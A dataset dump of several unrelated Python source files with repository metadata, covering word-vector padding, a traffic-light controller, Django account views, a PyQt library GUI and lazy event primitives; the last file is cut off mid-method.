a1a98084660cc501acd49cdd15981bc58431cd34 | 88ae634164c891ecbf7d7055b821fe0d71d84b1c | /pyproject/ctpdata/db/workspace/test20151004.py | cb8f9acceb9690359fc819b03a16630b1caeed3a | [] | no_license | fuckfuckfuckfuck/bin | 6d13cf25ba4cd3ab9a81ca39ed0d483804aa678b | 47dfb24c3b8564a65408affbaa775b04e9de8f5a | refs/heads/master | 2021-01-10T11:09:07.838840 | 2015-12-05T15:06:18 | 2015-12-05T15:06:18 | 47,460,286 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 303 | py | import test20151004polymorphism
class nDuck(test20151004polymorphism.Duck):
    """Duck subclass demonstrating inheritance and method extension."""

    def __init__(self):
        # Initialise the parent class on *this* instance. The original code
        # called test20151004polymorphism.Duck(), which constructed and
        # immediately discarded an unrelated Duck object.
        super().__init__()
        print("inited.")

    def quack(self):
        # Extend (not replace) the parent behaviour.
        super().quack()
        print("nDuck quack")
| [
"wchongyang@foxmail.com"
] | wchongyang@foxmail.com |
4e6436b92bf15308d8bad82a429263914f1b602f | a32e964877786a7c186682ead221f84155f6cf5e | /R-MT/keras/parserTools.py | 3bf197ad8e59c554d805d250a50442caf1ca97fc | [] | no_license | likufanele/universalwsd | a1fa1a9c46be61f5257c3e1f0e5eda34b33125e0 | 135a15e7412e6f206a5ee93a1082b96ca7c88ae2 | refs/heads/master | 2020-12-20T14:01:52.077356 | 2020-01-24T23:46:09 | 2020-01-24T23:46:09 | 236,101,761 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,026 | py | import numpy as np
import re
import string
from vectorOperations import sumVectors, getVectorModel, mergeVectors, distanciaE, getListVectors
def splitOrationsAndPad(key,listsWords,vectorsSet,translator,modelV,size):
    """Embed up to the first two sentences of *listsWords* as fixed-width
    (columns-padded) word-vector matrices and store them under *key* in
    *vectorsSet* (dict: key -> list of 2-D numpy arrays).

    The first stored sentence (new key) is flipped left-to-right ("right to
    left" context); later sentences for an existing key are kept in order.
    NOTE(review): the *translator* parameter is immediately overwritten
    below, so the caller's value is ignored. The inline comments mention a
    width of 70 but the hard-coded widths here are sizeLen=15 and 49/50 --
    confirm which is intended.
    """
    counterOrations=0
    #print(len(listsWords))
    sizeLen=15
    translator=str.maketrans('','',string.punctuation)
    for listWords in listsWords:
        #print(counterOrations)
        if(counterOrations<2):
            # Strip punctuation-like separators, then tokenise on whitespace.
            filtredListWords=re.sub('[,.;:]', '', listWords)
            tupleWords=tuple(filtredListWords.split())
            newVectorDef=getListVectors(tupleWords,translator,modelV,size)
            counterOrations+=1
            # A 1-D result (single word) has no second shape element; the
            # bare except treats it as one column of `size` rows.
            try:
                size,length=newVectorDef.shape
            except:
                size=newVectorDef.shape
                size=size[0]
                length=1
            if (key in vectorsSet):
                #print("existe clave")
                if(length<sizeLen):
                    #print("less 70, and existing key")
                    if(length!=1):
                        vectorsSet[key].append(np.append(newVectorDef, np.zeros((size,(sizeLen-length)),dtype=np.float32), axis=1))
                    else:
                        #print(np.column_stack([newVectorDef,np.zeros((size,(69)))]))
                        vectorsSet[key].append(np.column_stack([newVectorDef,np.zeros((size,(49)))])) #sizelen-1
                else:
                    #print("error when is more 70")
                    # Too long: truncate to the first 50 columns.
                    vectorsSet[key].append(newVectorDef[:,0:50])
            else:
                #print("from right to left",length)
                #from right to left
                if(length<sizeLen):
                    #print("less like 70")
                    if(length!=1):
                        bufferV=np.append(newVectorDef, np.zeros((size,(sizeLen-length)),dtype=np.float32), axis=1)
                    else:
                        bufferV=np.column_stack([newVectorDef,np.zeros((size,(49)))]) #sizelen-1
                    vectorsSet[key]=[np.flip(bufferV,1)]
                else:
                    #print("se anexa clave",newVectorDef.shape)
                    # Reverse column order, then keep the last 50 columns.
                    inverseVector=np.flip(newVectorDef,1)
                    vectorsSet[key]=[inverseVector[:,-50:]]
        else:
            break
def splitOrationsAndPadB(key,listsWords,vectorsSet,sizeLen,modelV,size):
    """Row-oriented variant of splitOrationsAndPad: embeds up to the first
    two sentences of *listsWords* as (rows-padded) word-vector matrices of
    *sizeLen* rows, stores them under *key* in *vectorsSet*, and finally
    appends the embedding of the key's head word (text before the first '.').

    The first sentence for a new key is right-aligned (zeros prepended, last
    sizeLen rows kept); later sentences are left-aligned and flipped upside
    down. NOTE(review): `size` is reassigned from the array shape inside the
    loop, shadowing the parameter -- verify callers rely on the parameter
    only for getListVectors.
    """
    counterOrations=0
    #sizeLen=15
    translator=str.maketrans('','',string.punctuation)
    for listWords in listsWords:
        #print(counterOrations)
        if(counterOrations<2):
            filtredListWords=re.sub('[,.;:]', '', listWords)
            tupleWords=tuple(filtredListWords.split())
            #3print(tupleWords)
            newVectorDef=getListVectors(tupleWords,translator,modelV,size) ##remember change column for row
            counterOrations+=1
            # 1-D result (single word): treat as one row of `size` columns.
            try:
                length,size=newVectorDef.shape
            except:
                sizeD=newVectorDef.shape
                size=sizeD[0]
                length=1
            if (key in vectorsSet):
                #print("left side",tupleWords )
                if(length<sizeLen):
                    #print("less 70, and existing key")
                    if(length!=1):
                        newVectorDef=np.append(newVectorDef, np.zeros(((sizeLen-length),size),dtype=np.float32), axis=0)
                        newVectorDef=np.flipud(newVectorDef)
                        vectorsSet[key].append(newVectorDef)
                    else:
                        #print(np.column_stack([newVectorDef,np.zeros((size,(69)))]))
                        vectorsSet[key].append(np.row_stack([newVectorDef,np.zeros(((sizeLen-1),size))]))
                else:
                    # Too long: truncate to the first sizeLen rows, then flip.
                    newVectorDef=newVectorDef[0:sizeLen,:]
                    newVectorDef=np.flipud(newVectorDef)
                    vectorsSet[key].append(newVectorDef)
                    #import pdb; pdb.set_trace()
            else:
                #print("right side",tupleWords )
                if(length<sizeLen):
                    #print("less like 5")
                    #testS.append(list(tupleWords))
                    if(length!=1):
                        #print("right side",tupleWords)
                        #print(list(tupleWords[-sizeLen:]))
                        #import pdb; pdb.set_trace()
                        bufferV=np.zeros(((sizeLen-length),size),dtype=np.float32)
                        bufferV=np.append(bufferV,newVectorDef, axis=0)
                        #for i in range(0,(sizeLen-length)):
                        #    testS.append(' ')
                    else:
                        bufferV=np.row_stack([np.zeros(((sizeLen-1),size)),newVectorDef])
                        #for i in range(0,(sizeLen-1)):
                        #    testS.append(' ')
                        #print("rightSide",tupleWords)
                        #print(tupleWords[-sizeLen:])
                        #import pdb; pdb.set_trace()
                    vectorsSet[key]=[bufferV[-sizeLen:]] #np.flip(bufferV,0)]
                else:
                    #print("se anexa clave")
                    #inverseVector=bufferV[-sizeLen:] #np.flip(newVectorDef,0)
                    vectorsSet[key]=[newVectorDef[-sizeLen:]]#[inverseVector[-sizeLen:,:]]
                    #print(tupleWords,tupleWords[-sizeLen:])
                    #import pdb; pdb.set_trace()
        else:
            #import pdb; pdb.set_trace()
            break
    # Append the head-word embedding (part of `key` before the first '.').
    partsKey=key.split('.')
    vectorsSet[key].append(getVectorModel(partsKey[0],modelV))
    #import pdb; pdb.set_trace()
def fillVectorsDefinition(vectorsDefinitions, senseDict, modelVectors, size):
    """Populate *vectorsDefinitions* in place with one merged vector per
    sense gloss.

    Args:
        vectorsDefinitions: dict filled as word -> {sense_id: vector}.
        senseDict: word -> {sense_id: definition string}.
        modelVectors: embedding model forwarded to mergeVectors().
        size: embedding dimensionality forwarded to mergeVectors().
    """
    # These names were used but never imported in the visible module, which
    # made the original function raise NameError at runtime.
    import datetime
    from time import sleep

    print("filled vectors def", datetime.datetime.now())
    translator = str.maketrans('', '', string.punctuation)
    for word in senseDict:
        definitions = senseDict[word]
        localVectorsDefinitions = {}
        for definition in definitions:
            instanceDefinition = definitions[definition]
            # Re-attach contracted negations split by the tokenizer ("do n't").
            instanceDefinition = instanceDefinition.replace(" n't", "n't")
            tupleWords = tuple(instanceDefinition.split())
            localVectorsDefinitions[definition] = mergeVectors(
                translator, tupleWords, modelVectors, size)
        vectorsDefinitions[word] = localVectorsDefinitions
        # NOTE(review): purpose of this delay is unclear (throttling?);
        # kept to preserve the original behaviour.
        sleep(0.01)
    print("filled vectors def", datetime.datetime.now())
| [
"noreply@github.com"
] | likufanele.noreply@github.com |
ca5675e6ff4c7c0059f8b1343a3866ce8ea68269 | 422cc95ddef1f66f35b9037186d78e3c708b4730 | /A1_PS7_INT_143.py | f77e09cb3bab22057098e22ac38c1549ee840ec7 | [] | no_license | manojbalaji1/interpreters | 4ebe34bd7559b76075eabed27cfc6debd66f5ae6 | aed7b228e305a55a9b6094d80b1d69c8990245d8 | refs/heads/master | 2020-12-09T05:46:47.709018 | 2020-01-12T17:31:40 | 2020-01-12T17:31:40 | 233,211,211 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,083 | py | from Interpreter.interpreters import interPretr
# Truncate the previous run's output file before the interpreter appends.
open('outputPS7.txt', 'w').close()
interp = interPretr()
interp.readApplications(inputfile="inputPS7.txt")
interp.showAll()
# interp.displayCandidates("Hindi")
# Dispatch each "command : arg [: arg]" line of the prompts file to the
# matching interpreter operation.
with open("promptsPS7.txt") as promptfile:
    for line in promptfile:
        print(line)
        data = line.strip().split(":")
        if data[0].strip() == "showMinList":
            try:
                interp.displayHireList()
            # NOTE(review): every command swallows all failures silently;
            # consider at least logging `e` when debugging.
            except Exception as e:
                pass
        elif data[0].strip() == "searchLanguage":
            try:
                interp.displayCandidates(data[1].strip())
            except Exception as e:
                pass
        elif data[0].strip() == "DirectTranslate":
            try:
                interp.findDirectTranslator(data[1].strip(), data[2].strip())
            except Exception as e:
                pass
        elif data[0].strip() == "TransRelation":
            try:
                interp.findTransRelation(data[1].strip(), data[2].strip())
            except Exception as e:
                pass
| [
"manojbalaji1@gmail.com"
] | manojbalaji1@gmail.com |
0b6e59dc34a33b978dbcf8b8704dd35cdf33c4d7 | f97a38640cce46a0fa4f2e4c05590004cde14d61 | /projectTS/modeControl/automaticFlexibleTime.py | d5e522fff3913cae6daf005105a5ec1dae1889c4 | [] | no_license | nch101/thesis-traffic-signal-control | bb9dcb43836e69fc4cd5954119b58fe74a03b445 | b3bd1676fb2ab440b74d6d7a1846bd4ce6cc4c63 | refs/heads/master | 2023-08-31T11:29:19.415019 | 2020-08-17T05:07:10 | 2020-08-17T05:07:10 | 249,964,030 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,102 | py | # ** automatic control mode **
# * Author: Nguyen Cong Huy *
# ****************************
# - *- coding: utf- 8 - *-
import projectTS.vals as vals
def automaticFlexibleTime():
    """Advance every traffic light one step using the flexible green times.

    Odd-indexed lights run north-south green first; even-indexed lights run
    west-south green first.
    """
    for idx in range(vals.nTrafficLights):
        if idx % 2:
            green, opposite = vals.timeGreenFlexibleNS, vals.timeGreenFlexibleWS
        else:
            green, opposite = vals.timeGreenFlexibleWS, vals.timeGreenFlexibleNS
        setTimeLight(green, opposite, idx)
def setTimeLight(timeGreen, timeGreenForTimeRed, index):
    """Move light *index* to its next phase once its timer has expired (-1).

    red -> green (timer = timeGreen), green -> yellow (timer = yellow time),
    yellow -> red (timer = opposite green + yellow + 2*delta + 3).
    """
    if vals.timeLight[index] != -1:
        return  # timer still running: nothing to do
    phase = vals.lightStatus[index]
    if phase == 'red':
        vals.timeLight[index] = timeGreen
        vals.lightStatus[index] = 'green'
    elif phase == 'yellow':
        vals.timeLight[index] = (
            timeGreenForTimeRed + vals.timeYellow[index] + 2 * vals.delta + 3
        )
        vals.lightStatus[index] = 'red'
    elif phase == 'green':
        vals.timeLight[index] = vals.timeYellow[index]
        vals.lightStatus[index] = 'yellow'
"="
] | = |
05a5ef1ddbad0e04df9d97f7d78e59f394d2112c | 56f89cdca74e14a1b8abcf8ac0a8ddd3247d58fe | /group20_final/podcast_app/urls.py | 7914caf0305d7efc52c438da7b3e81c17f1c31dc | [] | no_license | jack-rg/TweetAlong | 8fae6dba0a469fe0611dfba22e135993578953e4 | c4bf04c353e39d2ad0ae581b811084c202183895 | refs/heads/main | 2023-04-04T02:32:50.851358 | 2020-12-14T20:46:12 | 2020-12-14T20:46:12 | 360,310,793 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 180 | py | from django.urls import path
from . import views
urlpatterns = [
path('', views.home, name='podcast_app-home'),
path('tracks/', views.tracks, name='podcast_app-tracks')
] | [
"seanmed@bu.edu"
] | seanmed@bu.edu |
85ffa8e81eb472eac232b29cbb255545922873d2 | 1f5688a178ef1e21d4e449a0a7a97fc67f5ce218 | /venv/Scripts/easy_install-3.8-script.py | a74a204433cf7747ce98c87e7338f4529d085f56 | [] | no_license | St4n89/spendings-at-gui | f974cd08fdf520db81c353576069b24a801c7377 | 895cc2dfe75da5c0620b53510e7c53984a5718da | refs/heads/master | 2020-12-23T14:04:26.544239 | 2020-01-30T09:38:04 | 2020-01-30T09:38:04 | 237,174,806 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 440 | py | #!D:\Python\gui-svetik\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install-3.8'
# NOTE: auto-generated setuptools console-script wrapper -- do not edit by
# hand; it is regenerated when setuptools is (re)installed in this venv.
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
    # Strip the "-script.py"/".exe" suffix so argv[0] matches the command name.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(
        load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install-3.8')()
    )
| [
"stas.sirash@gmail.com"
] | stas.sirash@gmail.com |
c8c2388aacf9a93e788c79f3183bb7a4304a4f40 | c6ee7be1479797788dd9f9d3a29c0e76ea020db8 | /apscheduler_yqt/MyTestFile/16celery_rabbitmq/01/test.py | 9f8dba3fe0e8b813e291b135506fa9d9d5a7a897 | [] | no_license | hikekang/apscheduler_yqt | 2966e7231fff1f81c4fa4a75459cf638592aae6a | 0d30c2ef721b8ffeba98dca6b2441613b4ed608d | refs/heads/master | 2023-08-17T05:19:34.345553 | 2021-09-26T03:21:11 | 2021-09-26T03:21:11 | 406,217,786 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 272 | py | #!/usr/bin/python3.x
# -*- coding=utf-8 -*-
"""
Time : 2021/8/24 14:24
Author : hike
Email : hikehaidong@gmail.com
File Name : test.py
Description:
Software : PyCharm
"""
from tasks import add
# delay() enqueues add(4, 4) on the broker and returns an AsyncResult
# immediately, without waiting for a worker.
result=add.delay(4,4)
print(result)
# get() blocks until a worker completes the task and returns its value.
print(result.get())
"38242754+hikekang@users.noreply.github.com"
] | 38242754+hikekang@users.noreply.github.com |
ca733c4f0d08db52a07a496051f24168657ab96c | 6b3f1b032092be8878251c0e4de79332a43e5772 | /qt1.py | a8d36e3e1b365568846fa2af5799088a522f9225 | [] | no_license | NanshyVargas/library | 8bb1c2c7b14f083c0dcfaffaae8873ff09138916 | f9acef61d0c3d0fad67f1c108999140140b4ef2a | refs/heads/master | 2022-11-14T17:16:21.178895 | 2020-07-08T08:17:59 | 2020-07-08T08:17:59 | 276,699,791 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,715 | py | import sys
import proto1
from PyQt5.QtWidgets import (QWidget, QLabel, QTextEdit, QGridLayout, QApplication, QPushButton, QDesktopWidget)
class Example(QWidget):
    """Main library-review window: a log pane, id inputs, and action buttons
    wired to the proto1 library-management operations."""

    def templateAction(self, userId, bookId):
        '''Pre-fill the id fields with predefined values.'''
        self.textEdit2.insertPlainText(str(userId))
        self.textEdit3.insertPlainText(str(bookId))

    def __init__(self, conn, cursor):
        """Store the DB connection/cursor and build the UI."""
        super().__init__()
        self.initUI()
        self.bookid = None
        self.userid=None
        self.cursor = cursor
        self.conn = conn

    def initUI(self):
        """Create widgets, lay them out in a grid, and show the window."""
        self.I = 0
        label1 = QLabel('Логи')
        label2 = QLabel('Id книги')
        label3 = QLabel('Id пользователя')
        # Read-only pane where operation logs are written.
        self.textEdit1 = QTextEdit()
        """Сюда пишем логи"""
        self.textEdit1.setReadOnly(True)
        """Нельзя редактировать"""
        # Input field for the book id.
        self.textEdit2 = QTextEdit()
        """Для ввода id книги"""
        # Input field for the reader id.
        self.textEdit3 = QTextEdit()
        """Для ввода id читателя"""
        btn1 = QPushButton('Список должников')
        btn2 = QPushButton('Взять книгу')
        btn3 = QPushButton('Вернуть книгу')
        btn4 = QPushButton('Очистить')
        btn5 = QPushButton('Закончить ввод')
        btn1.clicked.connect(self.buttonClicked1)
        btn2.clicked.connect(self.buttonClicked2)
        btn3.clicked.connect(self.buttonClicked3)
        # The clear button wipes all logs from the screen.
        btn4.clicked.connect(self.textEdit1.clear)
        """Стираем все логи с экрана"""
        btn5.clicked.connect(self.buttonClicked5)
        grid = QGridLayout()
        grid.setSpacing(10)
        # Lay out the widgets in the grid
        grid.addWidget(label1, 0, 0, 1, 3)
        grid.addWidget(self.textEdit1, 1, 0, 1, 4)
        grid.addWidget(btn1, 2, 0)
        grid.addWidget(btn2, 2, 1)
        grid.addWidget(btn3, 2, 2)
        grid.addWidget(btn4, 2, 3)
        grid.addWidget(label2, 3, 1, 1, 1)
        grid.addWidget(self.textEdit2, 4, 1, 1, 1)
        grid.addWidget(label3, 3, 2, 1, 1)
        grid.addWidget(self.textEdit3, 4, 2, 1, 1)
        grid.addWidget(btn5, 5, 2)
        self.templateAction(1, 1)
        self.setLayout(grid)
        # Center a 500x500 window on the available screen area.
        x = QDesktopWidget().availableGeometry().center().x()
        y = QDesktopWidget().availableGeometry().center().y()
        width = 500
        height = 500
        self.setGeometry(x-width/2, y-height/2, 500, 500)
        self.setWindowTitle('Review')
        self.show()

    def buttonClicked1(self):
        """Print the list of debtors to the log pane."""
        self.textEdit1.insertPlainText(proto1.list_of_debtors(proto1.Bookmas, proto1.Usermas))

    def buttonClicked2(self):
        """Log the result of the "borrow book" operation."""
        self.textEdit1.insertPlainText(proto1.bring_book(proto1.Bookmas, proto1.Usermas, self.bookid, self.userid, self.conn, self.cursor))

    def buttonClicked3(self):
        """Log the result of the "return book" operation."""
        self.textEdit1.insertPlainText(proto1.return_book(proto1.Bookmas, proto1.Usermas, self.bookid, self.userid, self.conn, self.cursor))

    def buttonClicked5(self):
        """Finish input: parse the id fields into self.bookid / self.userid."""
        value = self.textEdit2.toPlainText()
        self.bookid = int(value)
        value = self.textEdit3.toPlainText()
        self.userid = int(value)
conn, cursor = proto1.openconn()  # open the library database connection
app = QApplication(sys.argv)
ex = Example(conn, cursor)
# NOTE(review): this runs on import too; consider an `if __name__ == '__main__':` guard.
sys.exit(app.exec_())
| [
"nanshy@yandex.ru"
] | nanshy@yandex.ru |
f5b339362038a0ce066bc2209c1d3c55c647852f | 445dafaf2f1341e556d0bcdff11e1b902b562d45 | /turtle/__main__.py | 087091d67c3b1269a0c814dc0dc2cdb81ba8bea4 | [] | no_license | bojinyao/exam-generation | 3102911cfcec440ff5fca619d83542561694e77d | 1db83a6aabf83f2887912ad698175a4295e21232 | refs/heads/master | 2021-01-08T13:48:22.585247 | 2020-04-25T05:39:09 | 2020-04-25T05:39:09 | 242,044,420 | 1 | 2 | null | 2020-04-25T05:39:10 | 2020-02-21T03:19:48 | Python | UTF-8 | Python | false | false | 938 | py | import argparse, sys, json
from config import default_configuration
from classes import *
#---------------- program arguments ----------------
def parse_arguments():
    """Build the CLI parser, parse sys.argv, and return (args, parser)."""
    parser = argparse.ArgumentParser(description="Speed up exam question")
    parser.add_argument(
        "-i", "--infile", nargs='?', metavar='',
        type=argparse.FileType('r'), default=None,
        help="path to configuration file if provided")
    parser.add_argument(
        "-o", "--outfile", nargs='?', metavar='',
        type=argparse.FileType('w+', encoding="UTF-8"), default=sys.stdout,
        help="path to output file if provided")
    parser.add_argument(
        '-q', '--num_questions', metavar='', type=int, default=1,
        help='number of questions to generate at once. Default 1')
    return parser.parse_args(), parser
def main():
    """Entry point: generate questions from the default configuration and
    print them as pretty-printed JSON."""
    # NOTE(review): the parsed CLI options (infile/outfile/num_questions)
    # are currently ignored by the generation below.
    args, parser = parse_arguments()
    s = speedUp(default_configuration)
    print(json.dumps(s.constructQuestions(), indent=4))
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | bojinyao.noreply@github.com |
aac7077bedabdf788b4d780e379f3b969de0eee9 | d28112305d39c043f1c26ebb66954b9ae9c43eee | /accounts/views.py | 8e3c0cfee76873f50c333ab1bfadbb0b391049b5 | [] | no_license | srkumar10/btre_project | 5addd72e5ba9ab1519a9b9b1fa1c6efd8a6e94e0 | 7f26a559c15f9d004f535c15a57d4f6d9c800053 | refs/heads/master | 2022-06-24T21:20:25.061830 | 2020-05-04T02:21:09 | 2020-05-04T02:21:09 | 261,059,333 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,866 | py | from django.shortcuts import render, redirect
from django.contrib import messages, auth
from django.contrib.auth.models import User
from contacts.models import Contact
def register(request):
    """Create a new user account.

    GET renders the registration form; POST validates the submission and,
    on success, creates the user and redirects to the login page. Any
    validation failure flashes an error and redirects back to the form.
    """
    if request.method != "POST":
        return render(request, 'accounts/register.html')

    # Get form values
    first_name = request.POST['first_name']
    last_name = request.POST['last_name']
    username = request.POST['username']
    email = request.POST['email']
    password = request.POST['password']
    password2 = request.POST['password2']

    # Validate with guard clauses (the original nested four levels deep).
    if password != password2:
        messages.error(request, 'Passwords do not match')
        return redirect('register')
    if User.objects.filter(username=username).exists():
        messages.error(request, 'That username is taken')
        return redirect('register')
    if User.objects.filter(email=email).exists():
        messages.error(request, 'That email is being used')
        return redirect('register')

    # create_user() hashes the password and persists the row, so the
    # original's extra user.save() call was redundant.
    User.objects.create_user(username=username, password=password, email=email,
                             first_name=first_name, last_name=last_name)
    messages.success(request, 'You are now registered and can log in')
    return redirect('login')
def login(request):
    """Authenticate the user on POST; render the login form on GET."""
    if request.method != "POST":
        return render(request, 'accounts/login.html')

    username = request.POST['username']
    password = request.POST['password']
    user = auth.authenticate(username=username, password=password)
    if user is None:
        messages.error(request, 'Invalid credentials')
        return redirect('login')

    auth.login(request, user)
    messages.success(request, 'You are now logged in')
    return redirect('dashboard')
def logout(request):
    """End the session on POST and send the user back to the index page."""
    if request.method == "POST":
        auth.logout(request)
        messages.success(request, 'You are now logged out')
        return redirect('index')
def dashboard(request):
    """Render the dashboard with the current user's contacts, newest first."""
    my_contacts = Contact.objects.order_by('-contact_date').filter(
        user_id=request.user.id)
    return render(request, 'accounts/dashboard.html', {'contacts': my_contacts})
| [
"rsunkara@ouc.com"
] | rsunkara@ouc.com |
82750c37529a17c849542e16db8487e588de28bf | 5edf9131cfe45f8f901aaed62f6528fc3774df3b | /clevros/primitives.py | 7825a022aca00f76abeda9520c47a14231aaef90 | [] | no_license | hans/clevr-oneshot | a07147ea4b9a17d3006904f07b2e5d93dbfc97e5 | e2aecee1718443714a9aad897bdbe973a974f4b9 | refs/heads/master | 2021-07-10T00:20:04.831270 | 2019-02-27T18:16:14 | 2019-02-27T18:26:24 | 105,565,520 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,485 | py | from frozendict import frozendict
import operator
class Event(object):
    """Placeholder for an event variable.

    All Event instances compare (and hash) as interchangeable; attribute
    and item access build lazy EventOp nodes instead of evaluating.
    """

    def __init__(self):
        pass

    def __eq__(self, other):
        # Every Event equals every other Event, and nothing else.
        return isinstance(other, Event)

    def __hash__(self):
        return hash(Event)

    def __getitem__(self, attr):
        return EventOp(self, getattr, attr)

    def __getattr__(self, attr):
        if attr.startswith("__"):
            # Never intercept dunder lookups.
            raise AttributeError
        return EventOp(self, getattr, attr)

    def __call__(self):
        # Dummy so an Event instance can stand in for a function in the
        # ontology.
        return None

    def __str__(self):
        return "<event>"

    __repr__ = __str__
class EventOp(object):
    """
    Deferred computation over an event: records an operation and its
    operands instead of running it, so expressions on events build a
    lazy operation tree.
    """

    def __init__(self, base, op, *args):
        self.base = base
        self.op = op
        self.args = tuple(args)

    def __hash__(self):
        return hash((self.base, self.op, self.args))

    def __eq__(self, other):
        """
        Eager structural comparison (by hash). For a *lazy* equality node,
        use `equals`.
        """
        return hash(self) == hash(other)

    def equals(self, other):
        """
        Build a lazy equality-check op. To compare `EventOp` instances
        eagerly, use `==`.
        """
        return EventOp(self, operator.eq, other)

    def __getitem__(self, attr):
        return EventOp(self, getattr, attr)

    def __getattr__(self, attr):
        if attr.startswith("__"):
            # Never intercept dunder lookups.
            raise AttributeError
        return EventOp(self, getattr, attr)

    def __add__(self, other):
        return EventOp(self, operator.add, other)

    def __sub__(self, other):
        return EventOp(self, operator.sub, other)

    def __mul__(self, other):
        return EventOp(self, operator.mul, other)

    def __rmul__(self, other):
        return EventOp(self, operator.mul, other)

    def __lt__(self, other):
        return EventOp(self, operator.lt, other)

    def __gt__(self, other):
        return EventOp(self, operator.gt, other)

    def __contains__(self, el):
        # NOTE(review): the `in` operator coerces this result to bool, so
        # the lazy node is only seen when __contains__ is called directly.
        return EventOp(self, operator.contains, el)

    def __call__(self, *args, **kwargs):
        return EventOp(self, operator.methodcaller, (*args, frozendict(kwargs)))

    def __str__(self, verbose=False):
        if verbose:
            rendered_op = repr(self.op)
        elif hasattr(self.op, "__name__"):
            rendered_op = self.op.__name__
        elif hasattr(self.op, "__call__"):
            rendered_op = self.op.__class__.__name__
        else:
            rendered_op = str(self.op)
        rendered_args = ", ".join(str(arg) for arg in self.args)
        return "EventOp<%s>(%s, %s)" % (rendered_op, self.base, rendered_args)

    def __repr__(self):
        return self.__str__(verbose=True)
class Object(object):
    """A scene object backed by an immutable attribute mapping.

    Unknown attribute lookups fall through to the stored ``attrs``
    mapping, so ``obj.shape`` and ``obj["shape"]`` are interchangeable.
    """

    def __init__(self, name=None, **attrs):
        self.attrs = frozendict(attrs)
        # When no explicit name is given, fall back to the `type` attribute.
        self.name = name or self.attrs.get("type")

    def __hash__(self):
        return hash((self.name, self.attrs))

    def __eq__(self, other):
        return hash(other) == hash(self)

    def __str__(self):
        return self.name

    def __repr__(self):
        return "O(%s: %s)" % (self.name, self.attrs)

    def __getattr__(self, attr):
        # Leave dunder lookups to the normal protocol.
        if attr.startswith("__"):
            raise AttributeError
        return self[attr]

    def __getitem__(self, attr):
        return self.attrs[attr]
class Collection(object):
    """A set of objects described by a characteristic function."""

    def __init__(self, characteristic):
        self.characteristic = characteristic

    def __hash__(self):
        # TODO not sure about the semantics!
        return hash(self.characteristic)

    def __eq__(self, other):
        return hash(other) == hash(self)
def fn_unique(xs):
    """Return the single key of `xs` mapped to a truthy value.

    Asserts that exactly one entry matches.
    """
    matching = [key for key, is_match in xs.items() if is_match]
    assert len(matching) == 1
    return matching[0]
def fn_cmp_pos(ax, manner, a, b):
    """Signed difference between `a` and `b` along the axis chosen by `ax()`.

    `manner == "pos"` keeps the natural sign; anything else flips it.
    """
    axis = ax()
    delta = a["3d_coords"][axis] - b["3d_coords"][axis]
    return delta if manner == "pos" else -delta
def fn_ltzero(x):
    """True iff `x` is negative."""
    return x < 0


def fn_and(a, b):
    """Logical conjunction (Python semantics: `a` if falsy, else `b`)."""
    return a and b


def fn_eq(a, b):
    """Equality that defers to a lazy `.equals` op when either side has one."""
    if hasattr(a, "equals"):
        return a.equals(b)
    if hasattr(b, "equals"):
        return b.equals(a)
    return a == b


def fn_not(a):
    """Strict boolean negation; rejects non-bool operands."""
    if not isinstance(a, bool):
        raise TypeError()
    return not a
## Ops on collections
def fn_set(a):
    """True iff `a` is a Collection."""
    return isinstance(a, Collection)


def fn_characteristic(a):
    """The defining (characteristic) function of a collection."""
    return a.characteristic


# Axis selectors mapping x/y/z onto coordinate indices.
def fn_ax_x():
    return 0


def fn_ax_y():
    return 1


def fn_ax_z():
    return 2
## Ops on objects

# Shape predicates over an object's `shape` attribute.
def fn_cube(x):
    return x.shape == "cube"


def fn_sphere(x):
    return x.shape == "sphere"


def fn_donut(x):
    return x.shape == "donut"


def fn_pyramid(x):
    return x.shape == "pyramid"


def fn_hose(x):
    return x.shape == "hose"


def fn_cylinder(x):
    return x.shape == "cylinder"


# Kind predicates over an object's `type` attribute.
def fn_apple(x):
    return x.type == "apple"


def fn_cookie(x):
    return x.type == "cookie"


def fn_book(x):
    return x.type == "book"


def fn_water(x):
    return x.type == "water"


def fn_object(x):
    """True iff `x` is a plain attribute mapping (an object literal)."""
    return isinstance(x, (frozendict, dict))


# Orientation / state predicates.
def fn_vertical(x):
    return x.orientation == "vertical"


def fn_horizontal(x):
    return x.orientation == "horizontal"


def fn_liquid(x):
    # `.state` may be a lazy EventOp, hence `.equals` rather than `==`.
    return x.state.equals("liquid")


def fn_full(x):
    return x.full
# Two-place ops on objects
def fn_contain(x, y):
    """Containment test, deferred as a lazy op when either side is event-like."""
    if isinstance(x, (Event, EventOp)) or isinstance(y, (Event, EventOp)):
        return x.contain(y)
    return x in y


def fn_contact(x, y):
    """Contact test, deferred as a lazy op when either side is event-like."""
    if isinstance(x, (Event, EventOp)):
        return x.contact(y)
    if isinstance(y, (Event, EventOp)):
        return y.contact(x)
    # TODO implement the actual op rather than the lazy comp representation :)
    return True
## Ops on events
class Action(object):
def __add__(self, other):
return ComposedAction(self, other)
def __eq__(self, other):
return isinstance(other, self.__class__) and hash(self) == hash(other)
@property
def entailed_actions(self):
"""
Return all actions which are logically entailed by this action.
"""
return []
class Constraint(object):
    # TODO semantics not right -- subclasses don't take multiple constraints. We
    # should have a separate `ComposedConstraint` class
    def __init__(self, *constraints):
        """Flatten any composite Constraint arguments into one frozenset."""
        constraints_flat = []
        for constraint in constraints:
            if constraint.__class__ == Constraint:
                # This is a composite constraint instance -- merge its containing
                # constraints.
                constraints_flat.extend(constraint.constraints)
            else:
                constraints_flat.append(constraint)
        self.constraints = frozenset(constraints_flat)

    def __add__(self, other):
